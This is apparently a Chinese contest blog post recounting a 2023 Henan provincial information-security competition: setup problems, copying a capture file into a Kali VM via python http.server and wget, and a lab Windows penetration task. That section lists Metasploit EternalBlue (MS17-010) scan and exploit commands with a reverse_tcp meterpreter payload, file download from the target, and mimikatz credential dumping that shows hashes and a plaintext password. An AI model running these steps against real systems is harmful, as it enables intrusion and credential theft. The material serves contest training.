2023年河南省信息安全管理与评估个人记录-赛中遇到的意外情况解决

情况&解决

文章持续更新! 文章持续更新! 文章持续更新! 文章持续更新! 文章持续更新! 文章持续更新! 文章持续更新! 文章持续更新! 文章持续更新!

阶段一

下发试题,会留有时间让选手进行设备状态的确认。内容大致为:

  1. 各个设备的正常启动且能访问
  2. 是否可以登录成功
  3. 键盘鼠标&显示器是否正常
  4. 设备的初始化账号,密码是否会出现意外情况。

完成确认,就会到规定时间下发试题卷(省内允许进行将一份试卷撕开使用,但需保证比赛时间后完整上交回收)。于此同时,将会拿到一个u盘。

注意事项:

赛题第一阶段请按裁判组专门提供的U盘中的“XXX-答题模板”中的要求提交答案。选手需要在U盘的根目录下建立一个名为“GWxx”的文件夹(xx用具体的工位号替代),所完成的“XXX-答题模板”放置在文件夹中作为比赛结果提交。

特殊情况

1、发现设备想要连接console进行设备的配置,自己带的线不知道啥原因识别不了,只有提供的一根可以识别成功。

解决思路:
最后猜测可能是console线没有驱动导致识别不了,但我们也做不到将设备驱动带到赛场。所以,还是按部就班,分工合作。

2、拿到赛题后发现题目有着很大的改变,拓扑图、侧重点(BGP、GRE、接口分配等)

解决思路:
赛后分析我个人觉得直接将80 web界面配置进行果断拿分,这是送分部分。把能拿的分数搞定,完成不了的果断放弃,直接进行阶段二、三做题。时间紧,不能浪费在阶段一太多时间,可以让队友直接整理第一阶段的截图。策略性拿分。

阶段二

以下图片均为22年国赛试题卷(做一个参考):

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

数据包分析

数据包分析,通常使用Wireshark进行,但这次比赛环境的遇到了最大的问题就是:

物理机的桌面上放着流量数据包,没有提供Wireshark,想要去打开需要复制到Vm-Kali虚拟机中(kali系统中有很多工具都在里面BP、Nmap、Msf等),结果发现复制不了,拖不进去到虚拟机,Vmware tools安装没有起效果。

解决思路:

1、http.server与wget

具体流程:

通常我们可以使用rz sz来在服务器和自己机器之间实现文件传输。
此外,如果服务器上没有安装rz sz,那么可以用python来开启一个简单的http服务器。
假设当前在服务器的/home/woods/目录下,服务器的ip是198.1.1.188,该目录下有a.txt文件。
使用如下命令,则可以开启一个服务器。

windows端充当服务器
python3 -m http.server 9111

假设当前在服务器的目录下,服务器的ip是192.168.146.1,该目录下有1.txt文件。
在这里插入图片描述

在另一个机器上,通过

 wget http://192.168.146.1:9111/1.txt在这里插入代码片

在这里插入图片描述
参考原文链接:https://blog.csdn.net/sodawoods/article/details/115740533

虚拟机端充当服务器
python3 -m http.server 9111

在这里插入图片描述
windows端
在这里插入图片描述
直接下载想要的文件

window渗透取证题目

1、是否开启445端口:open
2、就是漏洞利用:永恒之蓝 ms17-010
3、拿到靶机桌面上的文件内容:xxx
4、拿到靶机的NDS服务器地址:xxx
5、拿到回收站的内容:xxx
5、拿到管理员的密码:xxx

Windows-Ms17-010 永恒之蓝(题目2)

针对Windows漏洞的攻击:勒索病毒“永恒之蓝”攻击(利用445端口)

环境

靶机:xp
攻击机:kali

具体流程:

利用kali系统的MSF,进行攻击。
在这里插入图片描述
1、验证辅助阶段

> Msf>use auxiliary/scanner/smb/smb_ms17_010 Msf
> auxiliary(scanner/smb/smb_ms17_010)>set rhosts 192.168.2.1/24 Msf
> auxiliary(scanner/smb/smb_ms17_010)>set threads 30 Msf
> auxiliary(scanner/smb/smb_ms17_010)>run   *开始扫描

在这里插入图片描述
2、攻击阶段

Msf auxiliary(scanner/smb/smb_ms17_010)>use exploit/windows/smb/ms17_010_eternalblue
Msf exploit(windows/smb/ms17_010_eternalblue)>set rhost 192.168.2.62     #被攻击者IP
Msf exploit(windows/smb/ms17_010_eternalblue)set lhost 192.168.2.63     #自己的IP
Msf exploit(windows/smb/ms17_010_eternalblue)show options     #查一下payload名称
Msf exploit(windows/smb/ms17_010_eternalblue)>set payload windows/x64/meterpreter/reverse_tcp
Msf exploit(windows/smb/ms17_010_eternalblue)run

3、利用阶段

Meterpreter>screenshot   *抓屏保存到/root/
Meterpreter>shell       *得到shell  ctrl+c 退出shell  或者多次输入exit连续退出metasploit

拿到靶机桌面上的文件内容:xxx
通过cd 命令,但注意的是需要加上' ,不然路径切换不到桌面。
这里的Documents and Settings文件夹

事实上是微软停用了Documents and Settings文件夹,改为了【用户】(users);
所以,C:\Users\Administrator\AppData\Local\Temp和C:\Documents and
Settings\Administrator\Local Settings\Temp是一个文件夹。

然后使用download命令就可以拿到桌面内容了
在这里插入图片描述
拿到靶机的NDS服务器地址:xxx
这里直接进入shell
在这里插入图片描述
这里本想着chcp 65001将字符集设为中文,但发现回退到meterpreter,直接放弃挣扎。
在这里插入图片描述
这里进入shell,直接输入ipconfig /all ,拿到dns服务器地址。

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bg            Alias for background
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information or control active channels
    close         Closes a channel
    detach        Detach the meterpreter session (for http/https)
    disable_unic  Disables encoding of unicode strings
    ode_encoding
    enable_unico  Enables encoding of unicode strings
    de_encoding
    exit          Terminate the meterpreter session
    get_timeouts  Get the current session timeout values
    guid          Get the session GUID
    help          Help menu
    info          Displays information about a Post module
    irb           Open an interactive Ruby shell on the current session
    load          Load one or more meterpreter extensions
    machine_id    Get the MSF ID of the machine attached to the session
    migrate       Migrate the server to another process
    pivot         Manage pivot listeners
    pry           Open the Pry debugger on the current session
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    resource      Run the commands stored in a file
    run           Executes a meterpreter script or Post module
    secure        (Re)Negotiate TLV packet encryption on the session
    sessions      Quickly switch to another session
    set_timeouts  Set the current session timeout values
    sleep         Force Meterpreter to go quiet, then re-establish session
    ssl_verify    Modify the SSL certificate verification setting
    transport     Manage the transport mechanisms
    use           Deprecated alias for "load"
    uuid          Get the UUID for the current session
    write         Writes data to a channel
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username          Domain           LM                       NTLM                      SHA1
--------          ------           --                       ----                      ----
JZSZ-06F2EDC1E4$  WORKGROUP        aad3b435b51404eeaad3b43  31d6cfe0d16ae931b73c59d7  da39a3ee5e6b4b0d3255bfef
                                   5b51404ee                e0c089c0                  95601890afd80709
jsj               JZSZ-06F2EDC1E4  44efce164ab921caaad3b43  32ed87bdb5fdc5e9cba88547  6ed5833cf35286ebf8662b7b
                                   5b51404ee                376818d4                  5949f0d742bbec3f

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
JZSZ-06F2EDC1E4$  WORKGROUP        (null)
jsj               JZSZ-06F2EDC1E4  123456

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
JZSZ-06F2EDC1E4$  WORKGROUP        (null)
jsj               JZSZ-06F2EDC1E4  123456
jzsz-06f2edc1e4$  WORKGROUP        (null)


meterpreter > 

最后直接使用kiwi模块进行查找密码!
kiwi的使用参考:http://t.csdnimg.cn/rIXr0

  • 14
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值